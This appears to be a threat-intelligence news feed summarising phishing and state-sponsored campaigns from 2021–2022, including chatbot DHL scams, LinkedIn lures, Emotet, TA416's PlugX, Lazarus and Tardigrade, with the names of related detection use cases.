Phishing with Chatbots

May 24, 2022

Phishing with Chatbots

Industry: N/A | Level: Strategic | Source: BleepingComputer

In the latest efforts to improve the authenticity of phishing scams, attackers are incorporating chatbots to aid with credential theft. Observed by Trustwave and BleepingComputer, phishing emails using DHL shipping themes containing a weblink to a phishing URL are being used. Once the victim opens a web link, a page to a webchat opens with a scripted conversation attempting to add legitimacy by posting a photo of the alleged package claiming that due to a damaged label the parcel could not be delivered. This creative setup is designed to coerce the victim into releasing personal and payment information under the guise they are agreeing to re-process the package. The victim would provide shipping information for name, address, and phone number as well as payment details for the cost of shipping. The payment page even requests a one-time-passcode to provide an extra layer of legitimacy.

Rise in LinkedIn Phishing Lures

April 26, 2022

Rise in LinkedIn Phishing Lures

Industry: N/A | Level: Strategic | Source: CheckPoint

Social Media network has surpassed shipping, retail, and technology as the most targeted category for phishing. Previous campaigns have involved the usage of delivery tracking emails as lures however, the abuse with LinkedIn has accounted for over half (52%) of phishing emails based on CheckPoint’s research for the first quarter of 2022. The change in theme was quite dramatic as in the previous quarter, the LinkedIn theme was only utilized for 8% of phishing attempts. Threat actors appear to be leveraging the LinkedIn lures to obtain user credentials to the social media platform. Shipping companies are still a prominent abuse category, whilst in second place the timing to abuse victims remains rich to take advantage of e-commerce sales. The list of the 10 most abused brands of Q1 2022 by CheckPoint based on their usage is as follows LinkedIn (52%), DHL (14%), Google (7%), Microsoft (6%), FedEx (6%), WhatsApp (4%), Amazon (2%). Maersk (1%), AliExpress (0.8%) and Apple (0.8%).

IRS Themed Phishing with Emotet

March 22, 2022

IRS Themed Phishing with Emotet

Industry: N/A | Level: Tactical | Source: Cofense

In the spirit of the U.S. 2022 tax season, Emotet has tailoring its latest phishing campaign to the financial event. Cofense Intelligence has repeatedly identified Emotet using this particular theme in past years, masquerading as the Internal Revenue Service (IRS) to lure victims into opening an attached zip file containing a malicious document. The document if executed drops the Emotet .dll file onto the victim’s workstation.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Malicious Document Execution
    • Suspicious File written to Disk

Google TAG Provides Update on Russian Threat Groups

March 15, 2022

Google TAG Provides Update on Russian Threat Groups

Industry: Government, Media, Military | Level: Strategic | Source: GoogleTAG

Google’s Threat Analysis Group (TAG) provides an update on threat actor groups, APT28/FancyBear, Ghostwriter/UNC1151 and Mustang Panda/Temp.Hex, focusing attacks against Ukraine. Activity for APT28/FancyBear has identified phishing campaigns conducted to obtain user credentials against a Ukrainian media site. Threat actor group Ghostwriter/UNC1151 has also conducted phishing campaigns targeting the Polish and Ukrainian, government and military. Analysis for China based threat actor group, Mustang Panda/Temp.Hex has identified the distribution of a malicious zip file that downloads a malicious payload.

TA416

March 15, 2022

TA416

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update for activity since November 2021, involving Chinese APT group TA416, initiating targeted campaigns against European Diplomatic entities. An increase in activity has been observed since the invasion with Russia in Ukraine has taken place.  A new technique was identified in the group’s phishing campaigns.  Initiallythe threat group utilizes web bugs to profile victims to provide a “sign of life,” indicating to the attackers the victim is active and can be enticed into opening malicious emails. Phishing emails have then been observed to be leveraging “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service field while using a unique sender address generated by the service.” The abuse of the SMTP2Go service has enabled the group to impersonate different European organizations. When sending the malicious phishing emails, the threat actor provides a DropBox link containing the malware executable, PlugX in a zip file. Upon execution, the malware establishes persistence through DLL Search Order hijacking using PE file potplayermini.exe associated with a public media player and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk

Phishing with Citibank Lures

March 01, 2022

Phishing with Citibank Lures

Industry: Financial | Level: Strategic | Source: BleepingComputer

A widespread phishing campaign is luring customers of Citibank as reported by BleepingComputer and investigated by Bitdefender. Threat actors are spreading the phishing email attempting to capture the victim’s CitiBank online login credentials and personal user information. The email urges swift action from the user to avoid account suspension with a link leading to a fraudulent CitiBank login page. Victim statistics for the campaign as tracked by Bitdefender has found targets are predominantly Americans (81%) followed by UK users (7%) and South Korean users (4%). An alternative CitiBank-themed phishing campaign occurred between February 11th and 15th, 2022 incentivizing victims with an opportunity to win monetary prizes that attempt to capture users’ personal information including “full name, address, age, phone number, and a scanned copy of their national ID card.”

Belarusian Hackers, UNC1151 Target Ukraine

March 01, 2022

Belarusian Hackers, UNC1151 Target Ukraine

Industry: Defense, Military | Level: Strategic | Source: TechCrunch

Reported by TechCrunch and announced from a Ukraine’s Computer Emergency Response Team (CERT-UA) social media post, a phishing campaign conducted by Belarusian state-sponsored hacker group, UNC1151 is targeting Ukrainian military personnel private email accounts. State from CERT-UA, “Mass phishing emails have recently been observed targeting private i.ua and meta.ua accounts of Ukrainian military personnel and related individuals…After the account is compromised, the attackers, by the IMAP protocol, get access to all the messages. Later, the attackers use contact details from the victim’s address book to send the phishing emails.” Threat activity from UNC1151 has consistently been tied to targeting the Ukrainian military, thus attribution falls in line with the group’s historic trend from the past two years. The threat group is also believed to be attributed to the DDoS attacks against Ukrainian websites by the Kyiv government.

Lazarus Uses Windows Update Client

February 01, 2022

Lazarus Uses Windows Update Client

Industry: Defense | Level: Operational | Source: Malwarebytes

Malwarebytes Threat Intelligence team has identified a new wave of threat activity from North Korean threat group Lazarus that was observed as early as January 18th, 2022. Similar to past campaigns the group’s phishing theme involves new job opportunities to entice potential victims, particularly targeting victims in the defense industry as the job offers are posed to have originated from Lockheed Martin, BAE Systems, Boeing and Northrop Grumman. One of the two malicious documents makes use of multiple process injections for defense evasion and achieves persistence from the startup folder. A first also for a Lazarus campaign is the usage of GitHub as its C2. The second malicious document’s main difference is upon macro execution, mshta will execute a remote HTML page. The new campaign leverages the Windows Update client to evade security detection by utilizing the process to run a malicious DLL from an LNK file.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Execution from Startup Folder
    • Symbolic OR Hard File Link Created

New Device Registration Tactic

February 01, 2022

New Device Registration Tactic

Industry: N/A | Level: Tactical | Source: Microsoft

Research from Microsoft identified threat activity with attackers taking advantage of users’ accounts with unregistered devices for MFA. The attackers are then utilizing those accounts to register their devices onto the target organization’s Azure Active Directory. The threat occurs in two waves. The first involving a phishing campaign aiming to steal credentials and add an outlook rule. the outlook rule has a consistent pattern with over one hundred identified mailboxes having specific rule entry. The second wave utilizes the stolen credentials to gain access and expand their foothold in the target’s environment. Targeted organizations were located mostly in Australia, Singapore, Indonesia, and Thailand.

  • Anvilogic Use Cases:
    • O365 Inbox Rules
    • Add user to Azure AD Group or Role

Tardigrade Targeting Bio-Manufacturing Facilities and Research Centers

November 24, 2021

Tardigrade Targeting Bio-Manufacturing Facilities and Research Centers

Industry: Bio-manufacturing | Level: Strategic | Sources: BIO-ISAC & BleepingComputer

The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) issued an advisory on hacking group, Tardigrade. The group has been targeting bio-manufacturing facilities and research centers developing vaccines and critical medicine. A specific compromise in Spring 2021, in which a large biomanufacturing facility was impacted and an investigation showed, “a malware loader was identified that demonstrated a high degree of autonomy as well as metamorphic capabilities.” The same malware was identified in October 2021 at a second facility. Identified as a version of SmokeLoader , the malware is delivered through phishing or USB sticks. This variant is stealthy, as it can operate without a C2 connection. Reviewing attacks from Tardigrade throughout the year involved various entities such as Düsseldorf University, Americold, Miltenyi Biotec, the European Medicines Agency (EMA), and Ireland’s HSE. Given the variety of ransomware and payloads identified, it is likely the group partnered with different operations to provide initial network access.